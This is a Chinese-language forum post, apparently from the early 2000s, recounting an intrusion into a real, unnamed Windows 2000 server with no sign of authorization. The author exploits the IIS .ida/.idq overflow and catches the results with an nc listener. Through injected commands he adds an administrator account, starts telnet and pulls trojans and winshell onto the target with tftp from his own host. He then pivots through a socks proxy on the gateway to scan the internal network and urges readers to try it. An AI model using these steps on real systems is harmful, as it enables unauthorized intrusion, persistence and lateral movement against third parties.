一台win2000server主机,打了pack2,
有.ida漏洞,可以远程溢出,
但由于主机的一些设置
不能直接得到cmdshell,
成功入侵结果:得到localsystem权限的shell,并能用此主机侵入内网的其他2K主机.
因为是台国内的主机,不好公布IP,
有兴趣请在QQ上问我.
当时玩这台主机,觉得并没有什么复杂的技术问题,只是挺麻烦的,
从中可以学到在遇到问题时如何清晰自己的思路,找到解决方法.
我找到这台主机时,他只开了21.25.80.139等几个端口
我就按常规:
letmein \\IPADD -all -g
不行,我想:噢,做了安全配置,不允许枚举(错的)
算了,扫描80吧!21.25我没本事搞.
用xscan扫了一圈
发现
.idq漏洞
我想这还不简单,开始搞:
用溢出工具试了系统没装PACK,或装了PACK1
都失败了.那就试PACK2
idahack IPADD 80 0
哈哈,成功了.
对方主机已溢出,
那我就:
telnet ipadd 99
奇怪,屏幕一闪而过,断开了连接.
靠.
再试一次.
还是如此
晕了,思考:主机设置了安全策略,不允许从网络访问连接(也错了)
但这时,我对此主机已经有了浓厚的兴趣,好玩啊!
想到的办法:你有80端口,我也可以溢出
那我就可以不连接执行命令啊
用iisidq吧.(可怜,只会用别人的东西,自己也要写)
iisidq有命令行和图形界面的两个版本
开始
在本机开个NC监听(你不让我连你,我就让你来连我.这样就知道命令是否成功)
nc -vv -l -p 813
好了,
溢出对方主机,溢出后连接到我主机的813端口返回信息,
绑定命令net user aaa Aa1234-- /add
(密码写长点是害怕对方配置了密码策略,带来麻烦.)
成功溢出,本机NC监听来自对方的信息"命令成功完成"
哈哈哈,开心!!!
再来,溢出不了了,
(这是因为溢出可以让IIS暂时DDOS,也是这个原因,耽误了好长时间)
过会再试 命令 net localgroup administrators aaa /add
成功!!
这样,我已经在对方主机加了个admin组的用户aaa.
接下来大家都会知道了:
net use z: \\ipadd\C$ "Aa1234--" /user:"aaa"
又有问题
"远程计算机不可用"
TMD!!!
现在明白了:远程主机的tcp/ip协议未绑定netbios,那连个P啊!
再思考:
不能建立NB连接,也不能溢出后连接99端口,那可不可以打开对方的telnet连接23呢?
再来:
NC监听,
IISIDQ绑定命令net start telnet,然后溢出
成功! 对方开了23
再在自己的机器上建立AAA用户,密码:Aa1234--,用此用户开个CMD_windows
(这是干什么详见.abu.的文章"最快速登陆2000telnet")
然后 telnet IPADD
失败!! 不是验证引起的问题)
(对我这菜鸟来讲,这已经很头痛了.)
接着思考:我可以利用溢出绑定命令那我就可以用TFTP上传文件啊?
你有开了80,我给你搞个ASP的木马总可以访问吧!
(具体过程略,重复的步骤)
用IISIDQ绑定tftp -i yourADD get filesname
(这其中利用溢出绑定命令的办法得到了对方系统的一些信息.)
我在这个过程中成功的方法还有,上传了个"蓝色火焰"
因为想他可以已HTTP的方式连接,成功了.
最终让我得到CMDSHELL的是winshell2.0
我将winshell上传后.
用iisidq绑定at命令执行的
我成功的得到了CMDshell,也可以成功连接,对方主机也不断开.
然后就简单了,扫描内网,找找里面的机器
看看有什么好玩的,
(顺便提一下,其实snake的sksocks跳板,不要只用来上个QQ,当个跳板什么的,
想想看:把他装到网关上,远程连上来,扫描内网IP段,接着....)
最后,擦干净PP离开.
这台主机离我比较近,在那次以后我也没再去研究
我想99,23连不上的原因有可能是主机做了端口过滤
但不对,
我用winshell开个99端口,同样可以连上.
又想是不是winshell的shellcode和别的溢出程序的不一样
这个问题我就不知道了,也没去问janker.
那位知道请告诉我,谢谢~
匆忙之中写的很乱,也不太清楚,见谅!
sock5的这个用法,我觉得有必要再说一下,
像上面那台主机,我在3399做了sock5,
大家按一下得方法试一下,增加点印象:
正确得设置跳板GUI,
设置socksCAP,在CAP得设置中将分析命名设置为远程
运行superscan.exe(运行程序都在CAP内运行)
将连接和读取超时设为6000(我56K.慢,具体你可以自己试)
将"仅扫描可PING得主机"的勾去掉.
然后扫描192.168.0.250,这是内网一台文件服务器.2000server
会发现开了21.80.139.445.1025等端口
你在打开IE,输入http://192.168.0.250
看到什么? "此站正在建立......"
还可以干什么?
用一切你想的到的工具干你想做的事(此话严重了,有些也不行,但有太多的可以了)
现在你明白了吧,用SOCKS就可以突破网关限制,轻松扫描内网
比用别的端口转发工具容易太多也灵活很多(如:fpipe)
也给网管提个醒,网关的安全太重要了.